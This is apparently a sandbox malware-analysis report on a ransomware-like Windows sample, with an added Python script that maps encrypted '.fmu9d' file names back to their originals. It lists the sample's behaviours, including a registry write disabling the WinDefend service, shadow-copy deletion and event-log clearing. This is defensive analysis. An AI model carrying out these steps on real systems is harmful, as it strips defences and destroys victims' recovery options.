Analysis Overview
SHA256
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
Threat Level: Known bad
The file cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68 was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Modifies security service
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Interacts with shadow copies
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 11:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 11:04
Reported
2022-01-13 11:09
Platform
win7-en-20211208
Max time kernel
48s
Max time network
14s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado28.tlb | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_sK9Z6uVqgCA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_ktQG2gupiNg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_wzbAmmSTcUc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG.wmv | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_MhONk5VDv180.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_HYlCkFtTUwI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_m.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_5CMJabjKdpM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_irmsRX9qs740.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_q81bQfQ2f1Y0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NoEGqOHMJWk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.sfx.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_cwXQgAQAQfI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground.wmv | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_BlfwRvA2pzs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_VipML3zsbvg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_kpWy3fnCXck0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_eLG0CqoMiTA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_hN6tnWzTRKA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_ywVQAU2fjic0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg_sml.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\picturePuzzle.css | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_4oAyxzhVM1g0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_n4jsJOo2n8k0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NugW263pHY40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318804.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_LntGZXJ11zc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Bwbzt3M7wMw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_WUEr4Y1hm8Y0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\es-ES\WMPMediaSharing.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pa-in.txt.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_fE2zslmI26w0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\TipTsf.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_uf0jDBkID040.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_Off.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_6_Z3hoH2DiM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_LeKKP-R4cPM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_sMANohA3BTY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_z3Qsr1ZexBk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_urNWfzniZow0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_rfnb0gdSkok0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PIXEL\THMBNAIL.PNG.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_bOvj6YDEwaI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105412.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_vBYlIJuWoGY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Ksfl8zQYAyQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_yC8Io2umc9c0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_qnbAWbrVUAU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_uniYPXU4nnQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Phoenix.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NEKuOA9cTA40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_xcOR5JuLIaI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonIcon.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Tn8rNgR3ZQk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\ehshellLogo.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_wqyP41r4tuQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\MSTAG.TLB.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_tU27Jl307qQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
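The table above shows the sample's rename scheme: an encrypted file keeps its original name and gains the suffix `.<43-character token>_<12-character token>.fmu9d`, where the first token is identical for every file in this run and the second differs per file. Paths listed without the suffix were recorded only as opened for modification; whether they were renamed later in the 48-second run is not shown on the page. The parser below is an added example, not part of the sandbox report or of the sample, that recovers the original path of each renamed file and checks that only one shared token appears. The sample paths are copied from the table above; what the two tokens encode is not stated on the page and is left open here.

```python
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Iterable, Optional

# Name pattern visible in the "Drops file in Program Files directory" table:
#   <original name>.<43-char token shared by every file>_<12-char per-file token>.fmu9d
# Both tokens use only A-Z a-z 0-9 '-' '_'. The page does not say what they encode, so
# the parser relies on this structure alone; the fixed lengths are what was observed.
ENCRYPTED_NAME_RE = re.compile(
    r"^(?P<original>.+?)"                # original file name, may itself contain dots
    r"\.(?P<shared>[A-Za-z0-9_-]{43})"   # token identical across all renamed files
    r"_(?P<per_file>[A-Za-z0-9_-]{12})"  # token that differs for each file
    r"\.fmu9d$"
)


@dataclass(frozen=True)
class EncryptedName:
    path: str            # path as recorded by the sandbox
    original_path: str   # same path with the appended marker stripped
    shared_token: str
    per_file_token: str


def parse_encrypted_name(path: str) -> Optional[EncryptedName]:
    """Decode the marker of a renamed file; return None if the name does not match."""
    p = PureWindowsPath(path)
    m = ENCRYPTED_NAME_RE.match(p.name)
    if m is None:
        return None
    return EncryptedName(
        path=path,
        original_path=str(p.with_name(m["original"])),
        shared_token=m["shared"],
        per_file_token=m["per_file"],
    )


def triage(paths: Iterable[str]) -> dict:
    """Split touched paths into renamed (encrypted) and not-yet-renamed files and count
    the shared tokens seen. The report shows exactly one token; more than one would
    point to mixed runs or a different sample."""
    renamed, untouched = [], []
    for path in paths:
        parsed = parse_encrypted_name(path)
        (renamed if parsed else untouched).append(parsed or path)
    return {
        "renamed": renamed,
        "untouched": untouched,
        "shared_tokens": Counter(e.shared_token for e in renamed),
    }


# Sample input: eight paths copied from the table above (constructed test data, not a
# new capture). Two carry no marker and were only opened for modification.
SAMPLE_PATHS = [
    r"C:\Program Files\Common Files\System\ado\msado28.tlb",
    r"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_sK9Z6uVqgCA0.fmu9d",
    r"C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png",
    r"C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_ktQG2gupiNg0.fmu9d",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_eLG0CqoMiTA0.fmu9d",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_LeKKP-R4cPM0.fmu9d",
    r"C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_6_Z3hoH2DiM0.fmu9d",
    r"C:\Program Files\7-Zip\7z.sfx.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_cwXQgAQAQfI0.fmu9d",
]

if __name__ == "__main__":
    result = triage(SAMPLE_PATHS)
    for e in result["renamed"]:
        print(f"{e.per_file_token}  {e.original_path}")
    print("not renamed:", len(result["untouched"]))
    print("shared tokens:", dict(result["shared_tokens"]))
```

Run against a file listing from an affected volume, `parse_encrypted_name` gives the name to restore each file under once a clean copy is available, and a single entry in `shared_tokens` confirms the whole listing came from one run of this sample.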
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
